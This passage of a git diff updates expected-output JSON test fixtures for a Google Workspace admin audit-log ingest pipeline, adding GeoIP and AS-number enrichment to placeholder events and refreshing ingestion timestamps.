"country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1550,7 +1838,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079670600Z", + "ingested": "2021-12-14T14:44:50.020605586Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"UNBLOCK_ON_DEVICE_ACCESS\",\"parameters\":[{\"name\":\"OAUTH2_SERVICE_NAME\",\"value\":\"CALENDAR\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "UNBLOCK_ON_DEVICE_ACCESS", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-sites.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-sites.log-expected.json index 502bc0e559d..19316e6b3b0 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-sites.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-sites.log-expected.json @@ -1,21 +1,6 @@ { "expected": [ { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "url": { - "path": "/path/in/url" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -44,8 +29,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:38:56.332587700Z", + "ingested": "2021-12-14T14:44:53.816580883Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"ADD_WEB_ADDRESS\",\"parameters\":[{\"name\":\"SITE_LOCATION\",\"value\":\"/path/in/url\"},{\"name\":\"WEB_ADDRESS\",\"value\":\"http://example.com/path/in/url\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "ADD_WEB_ADDRESS", @@ -61,24 +67,15 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "url": { "path": "/path/in/url" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -107,8 +104,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:38:56.332595800Z", + "ingested": "2021-12-14T14:44:53.816583730Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"DELETE_WEB_ADDRESS\",\"parameters\":[{\"name\":\"SITE_LOCATION\",\"value\":\"/path/in/url\"},{\"name\":\"WEB_ADDRESS\",\"value\":\"http://example.com/path/in/url\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "DELETE_WEB_ADDRESS", @@ -124,7 +142,13 @@ "name": "foo", "domain": "bar.com", "id": "1" - } + }, + "url": { + "path": "/path/in/url" + }, + "tags": [ + "preserve_original_event" + ] }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -160,6 +184,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -169,7 +205,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:56.332601300Z", + "ingested": "2021-12-14T14:44:53.816584287Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"CHANGE_SITES_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_SITES_SETTING", @@ -225,6 +261,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -234,7 +282,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:56.332606600Z", + "ingested": "2021-12-14T14:44:53.816584642Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"CHANGE_SITES_WEB_ADDRESS_MAPPING_UPDATES\",\"parameters\":[{\"name\":\"SERVICE_NAME\",\"value\":\"service\"},{\"name\":\"SITE_LOCATION\",\"value\":\"/path/in/url\"},{\"name\":\"WEB_ADDRESS\",\"value\":\"http://example.com/path/in/url\"}]}}", "provider": "admin", "action": "CHANGE_SITES_WEB_ADDRESS_MAPPING_UPDATES", @@ -290,6 +338,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -299,7 +359,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:56.332611900Z", + "ingested": "2021-12-14T14:44:53.816585002Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"VIEW_SITE_DETAILS\",\"parameters\":[{\"name\":\"SITE_NAME\",\"value\":\"site\"}]}}", "provider": "admin", "action": "VIEW_SITE_DETAILS", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-user.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-user.log-expected.json index d406f2949e8..e824fdcd9c9 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-user.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-user.log-expected.json @@ -35,6 +35,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -44,7 +56,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004798300Z", + "ingested": "2021-12-14T14:44:54.651967253Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_2SV_SCRATCH_CODES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "DELETE_2SV_SCRATCH_CODES", @@ -106,6 +118,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -115,7 +139,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004807500Z", + "ingested": "2021-12-14T14:44:54.651970061Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"GENERATE_2SV_SCRATCH_CODES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "GENERATE_2SV_SCRATCH_CODES", @@ -176,6 +200,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -185,7 +221,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004813100Z", + "ingested": "2021-12-14T14:44:54.651970529Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_3LO_DEVICE_TOKENS\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "REVOKE_3LO_DEVICE_TOKENS", @@ -241,6 +277,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -250,7 +298,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004818600Z", + "ingested": "2021-12-14T14:44:54.651970913Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_3LO_TOKEN\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"id\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "REVOKE_3LO_TOKEN", @@ -307,6 +355,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -316,7 +376,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004824Z", + "ingested": "2021-12-14T14:44:54.651971273Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ADD_RECOVERY_EMAIL\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "ADD_RECOVERY_EMAIL", @@ -378,6 +438,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -387,7 +459,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004829400Z", + "ingested": "2021-12-14T14:44:54.651971662Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ADD_RECOVERY_PHONE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "ADD_RECOVERY_PHONE", @@ -449,6 +521,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -458,7 +542,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004834800Z", + "ingested": "2021-12-14T14:44:54.651972036Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"GRANT_ADMIN_PRIVILEGE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "GRANT_ADMIN_PRIVILEGE", @@ -520,6 +604,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -529,7 +625,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004840200Z", + "ingested": "2021-12-14T14:44:54.651972395Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_ADMIN_PRIVILEGE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "REVOKE_ADMIN_PRIVILEGE", @@ -590,6 +686,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -599,7 +707,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004845700Z", + "ingested": "2021-12-14T14:44:54.651972767Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_ASP\",\"parameters\":[{\"name\":\"ASP_ID\",\"value\":\"id\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "REVOKE_ASP", @@ -653,6 +761,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -662,7 +782,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004851Z", + "ingested": "2021-12-14T14:44:54.651973126Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"TOGGLE_AUTOMATIC_CONTACT_SHARING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "TOGGLE_AUTOMATIC_CONTACT_SHARING", @@ -718,6 +838,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -727,7 +859,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004856400Z", + "ingested": "2021-12-14T14:44:54.651973483Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"BULK_UPLOAD\",\"parameters\":[{\"name\":\"BULK_UPLOAD_FAIL_USERS_NUMBER\",\"value\":\"1\"},{\"name\":\"BULK_UPLOAD_TOTAL_USERS_NUMBER\",\"value\":\"10\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "BULK_UPLOAD", @@ -783,6 +915,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -792,7 +936,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004862100Z", + "ingested": "2021-12-14T14:44:54.651973985Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"BULK_UPLOAD_NOTIFICATION_SENT\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "BULK_UPLOAD_NOTIFICATION_SENT", @@ -854,6 +998,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -863,7 +1019,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004867700Z", + "ingested": "2021-12-14T14:44:54.651974370Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CANCEL_USER_INVITE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "CANCEL_USER_INVITE", @@ -925,6 +1081,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -934,7 +1102,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004873100Z", + "ingested": "2021-12-14T14:44:54.651974725Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_CUSTOM_FIELD\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_CUSTOM_FIELD\",\"value\":\"custom\"}]}}", "provider": "admin", "action": "CHANGE_USER_CUSTOM_FIELD", @@ -996,6 +1164,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1005,7 +1185,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004878500Z", + "ingested": "2021-12-14T14:44:54.651975089Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_EXTERNAL_ID\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_USER_EXTERNAL_ID", @@ -1067,6 +1247,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1076,7 +1268,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004883400Z", + "ingested": "2021-12-14T14:44:54.651975464Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_GENDER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_USER_GENDER", @@ -1138,6 +1330,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1147,7 +1351,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004886700Z", + "ingested": "2021-12-14T14:44:54.651975953Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_IM\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_USER_IM", @@ -1209,6 +1413,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1218,7 +1434,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004891Z", + "ingested": "2021-12-14T14:44:54.651976326Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ENABLE_USER_IP_WHITELIST\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "ENABLE_USER_IP_WHITELIST", @@ -1280,6 +1496,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1289,7 +1517,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004896200Z", + "ingested": "2021-12-14T14:44:54.651976692Z", "original": 